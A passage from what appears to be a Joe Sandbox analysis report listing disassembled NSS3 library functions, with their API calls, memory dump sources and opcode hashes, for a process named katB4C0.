                                                                          • Part of subcall function 6CA94C70: TlsGetValue.KERNEL32(?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94C97
                                                                          • Part of subcall function 6CA94C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CB0
                                                                          • Part of subcall function 6CA94C70: PR_Unlock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CC9
                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6CB5ED52
                                                                        • PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB5ED83
                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6CB5ED95
                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6CB5ED9D
                                                                          • Part of subcall function 6CB764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CB7127C,00000000,00000000,00000000), ref: 6CB7650E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                        • String ID: security
                                                                        • API String ID: 3323615905-3315324353
                                                                        • Opcode ID: 02e6914b1a7ec1641caa1ac1aa4eaeb025362ac829114cf2c547af79a82545cd
                                                                        • Instruction ID: 08d508990d98e3a57345dcf8533dca416304a8d24894ebae26c1cf17b163b77d
                                                                        • Opcode Fuzzy Hash: 02e6914b1a7ec1641caa1ac1aa4eaeb025362ac829114cf2c547af79a82545cd
                                                                        • Instruction Fuzzy Hash: D71157369002E46BEA205A25AC44FBF7378EF0171CF450425EC6462E81FB28A56CD7F7
                                                                        Function 6CB42CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6CB42CEC
                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CB42D07
                                                                          • Part of subcall function 6CC209D0: PR_Now.NSS3 ref: 6CC20A22
                                                                          • Part of subcall function 6CC209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC20A35
                                                                          • Part of subcall function 6CC209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC20A66
                                                                          • Part of subcall function 6CC209D0: PR_GetCurrentThread.NSS3 ref: 6CC20A70
                                                                          • Part of subcall function 6CC209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC20A9D
                                                                          • Part of subcall function 6CC209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC20AC8
                                                                          • Part of subcall function 6CC209D0: PR_vsmprintf.NSS3(?,?), ref: 6CC20AE8
                                                                          • Part of subcall function 6CC209D0: EnterCriticalSection.KERNEL32(?), ref: 6CC20B19
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC20B48
                                                                          • Part of subcall function 6CC209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC20C76
                                                                          • Part of subcall function 6CC209D0: PR_LogFlush.NSS3 ref: 6CC20C7E
                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB42D22
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(?), ref: 6CC20B88
                                                                          • Part of subcall function 6CC209D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC20C5D
                                                                          • Part of subcall function 6CC209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC20C8D
                                                                          • Part of subcall function 6CC209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC20C9C
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(?), ref: 6CC20CD1
                                                                          • Part of subcall function 6CC209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC20CEC
                                                                          • Part of subcall function 6CC209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC20CFB
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC20D16
                                                                          • Part of subcall function 6CC209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC20D26
                                                                          • Part of subcall function 6CC209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC20D35
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC20D65
                                                                          • Part of subcall function 6CC209D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC20D70
                                                                          • Part of subcall function 6CC209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC20D90
                                                                          • Part of subcall function 6CC209D0: free.MOZGLUE(00000000), ref: 6CC20D99
                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB42D3B
                                                                          • Part of subcall function 6CC209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC20BAB
                                                                          • Part of subcall function 6CC209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC20BBA
                                                                          • Part of subcall function 6CC209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC20D7E
                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CB42D54
                                                                          • Part of subcall function 6CC209D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC20BCB
                                                                          • Part of subcall function 6CC209D0: EnterCriticalSection.KERNEL32(?), ref: 6CC20BDE
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(?), ref: 6CC20C16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                        • API String ID: 420000887-1567254798
                                                                        • Opcode ID: 869291b9c65d8e2af903c3217a90c77f0c1b88aa8efe6807f88f4f7b227732b9
                                                                        • Instruction ID: 6c51f3766a7fd7014f2d25b9b26fcffce45622bcd1d371a7c95ff4dba7517e2a
                                                                        • Opcode Fuzzy Hash: 869291b9c65d8e2af903c3217a90c77f0c1b88aa8efe6807f88f4f7b227732b9
                                                                        • Instruction Fuzzy Hash: B621B6796001A4EFDB01AF54DD6CA893BB1FB4232AF04C025E508D7622EB318849EB72
                                                                        Function 6CB84DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6CB84DCB
                                                                          • Part of subcall function 6CB70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB187ED,00000800,6CB0EF74,00000000), ref: 6CB71000
                                                                          • Part of subcall function 6CB70FF0: PR_NewLock.NSS3(?,00000800,6CB0EF74,00000000), ref: 6CB71016
                                                                          • Part of subcall function 6CB70FF0: PL_InitArenaPool.NSS3(00000000,security,6CB187ED,00000008,?,00000800,6CB0EF74,00000000), ref: 6CB7102B
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB84DE1
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB84DFF
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB84E59
                                                                          • Part of subcall function 6CB6FAB0: free.MOZGLUE(?,-00000001,?,?,6CB0F673,00000000,00000000), ref: 6CB6FAC7
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC4300C,00000000), ref: 6CB84EB8
                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6CB84EFF
                                                                        • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB84F56
                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB8521A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                        • String ID:
                                                                        • API String ID: 1025791883-0
                                                                        • Opcode ID: d81f8d28485892a313e51b6f65d40b8be8f009a0692b6a0a10d30c883dc3bf2a
                                                                        • Instruction ID: a785fd02e490844619d41621c33f562abacde64151bb6b918b26903141ac3ea9
                                                                        • Opcode Fuzzy Hash: d81f8d28485892a313e51b6f65d40b8be8f009a0692b6a0a10d30c883dc3bf2a
                                                                        • Instruction Fuzzy Hash: C4F1BC71E02249CBEB08CF54D8507AEB7B6FF44358F258129E816AB780E735E985CF91
                                                                        Function 6CB80C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6CB82C2A), ref: 6CB80C81
                                                                          • Part of subcall function 6CB6BE30: SECOID_FindOID_Util.NSS3(6CB2311B,00000000,?,6CB2311B,?), ref: 6CB6BE44
                                                                          • Part of subcall function 6CB58500: SECOID_GetAlgorithmTag_Util.NSS3(6CB595DC,00000000,00000000,00000000,?,6CB595DC,00000000,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB58517
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB80CC4
                                                                          • Part of subcall function 6CB6FAB0: free.MOZGLUE(?,-00000001,?,?,6CB0F673,00000000,00000000), ref: 6CB6FAC7
                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB80CD5
                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB80D1D
                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB80D3B
                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB80D7D
                                                                        • free.MOZGLUE(00000000), ref: 6CB80DB5
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB80DC1
                                                                        • free.MOZGLUE(00000000), ref: 6CB80DF7
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB80E05
                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB80E0F
                                                                          • Part of subcall function 6CB595C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB595E0
                                                                          • Part of subcall function 6CB595C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CB37F4A,00000000,?,00000000,00000000), ref: 6CB595F5
                                                                          • Part of subcall function 6CB595C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CB59609
                                                                          • Part of subcall function 6CB595C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB5961D
                                                                          • Part of subcall function 6CB595C0: PK11_GetInternalSlot.NSS3 ref: 6CB5970B
                                                                          • Part of subcall function 6CB595C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB59756
                                                                          • Part of subcall function 6CB595C0: PK11_GetIVLength.NSS3(?), ref: 6CB59767
                                                                          • Part of subcall function 6CB595C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB5977E
                                                                          • Part of subcall function 6CB595C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB5978E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                        • String ID:
                                                                        • API String ID: 3136566230-0
                                                                        • Opcode ID: 6d41c49516ab830101a370e31d110681c53bed9f7fac08a016371bddb97ffea0
                                                                        • Instruction ID: 278072201fa3d6ccf076edb947b854dae3b07604ebd0cc3a88cad8e773116311
                                                                        • Opcode Fuzzy Hash: 6d41c49516ab830101a370e31d110681c53bed9f7fac08a016371bddb97ffea0
                                                                        • Instruction Fuzzy Hash: DB41B1B19022A5ABEB009F65EC41BAF7674EF00348F104128ED1957B42E735AA54CBE2
                                                                        Function 6CB2FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CB2FCBD
                                                                        • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CB2FCCC
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CB2FCEF
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB2FD32
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CB2FD46
                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6CB2FD51
                                                                        • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CB2FD6D
                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB2FD84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                        • String ID: :
                                                                        • API String ID: 183580322-336475711
                                                                        • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                        • Instruction ID: 2521a057f2ee75d0ee5cd2ab03a4b5512e86745356165cfd22ae87d13eadeb27
                                                                        • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                        • Instruction Fuzzy Hash: 3531E2B29002B55BEB008AB4DC057BF77A8EF40758F150139DC18A7B01E779E908C7D2
                                                                        Function 6CB46C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6CB46C66
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB46C94
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB46CA3
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB46CB9
                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB46CD5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                        • API String ID: 1003633598-3690128261
                                                                        • Opcode ID: 5bebfe1ac23b3641c74c90d49b97b666ec1bff11a3e902bcf4697f661d0b86b0
                                                                        • Instruction ID: 581cbba483859b97580f47a39b43832032ef40f289866c87fceed486495194f9
                                                                        • Opcode Fuzzy Hash: 5bebfe1ac23b3641c74c90d49b97b666ec1bff11a3e902bcf4697f661d0b86b0
                                                                        • Instruction Fuzzy Hash: 1C2106307041A4DFDB019B159D58F9E37B5EB42319F048025E409D7B02EF349808DBB2
                                                                        Function 6CB49DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CB49DF6
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB49E24
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB49E33
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB49E49
                                                                        • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CB49E65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                        • API String ID: 1003633598-1678415578
                                                                        • Opcode ID: ecb1d61e4078ad9ee1c4467eef8ecc7b69b44490351a9e18f2528ccdb6477493
                                                                        • Instruction ID: 2662c8af0b7eec00f82e637b893245a8f863d3e693e0f7ea4b07910ea2fbb338
                                                                        • Opcode Fuzzy Hash: ecb1d61e4078ad9ee1c4467eef8ecc7b69b44490351a9e18f2528ccdb6477493
                                                                        • Instruction Fuzzy Hash: 2E212670A451A4EFDB019B14DE98FAE37B8EB4231DF048025E809A7611EB349C4CD7B2
                                                                        Function 6CB16DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,6CB17D8F,6CB17D8F,?,?), ref: 6CB16DC8
                                                                          • Part of subcall function 6CB6FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB6FE08
                                                                          • Part of subcall function 6CB6FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB6FE1D
                                                                          • Part of subcall function 6CB6FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB6FE62
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CB17D8F,?,?), ref: 6CB16DD5
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC38FA0,00000000,?,?,?,?,6CB17D8F,?,?), ref: 6CB16DF7
                                                                          • Part of subcall function 6CB6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC418D0,?), ref: 6CB6B095
                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB16E35
                                                                          • Part of subcall function 6CB6FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB6FE29
                                                                          • Part of subcall function 6CB6FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB6FE3D
                                                                          • Part of subcall function 6CB6FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CB6FE6F
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB16E4C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7116E
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC38FE0,00000000), ref: 6CB16E82
                                                                          • Part of subcall function 6CB16AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CB1B21D,00000000,00000000,6CB1B219,?,6CB16BFB,00000000,?,00000000,00000000,?,?,?,6CB1B21D), ref: 6CB16B01
                                                                          • Part of subcall function 6CB16AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CB16B8A
                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB16F1E
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB16F35
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC38FE0,00000000), ref: 6CB16F6B
                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6CB17D8F,?,?), ref: 6CB16FE1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                        • String ID:
                                                                        • API String ID: 587344769-0
                                                                        • Opcode ID: f10c08a4c690efdd3d6014cdb477dfd91b95a565309c6b6afa664908a5c79002
                                                                        • Instruction ID: 66ddf0cb70e26ced5259780fef02f662e2f515df29f49776112105087916253a
                                                                        • Opcode Fuzzy Hash: f10c08a4c690efdd3d6014cdb477dfd91b95a565309c6b6afa664908a5c79002
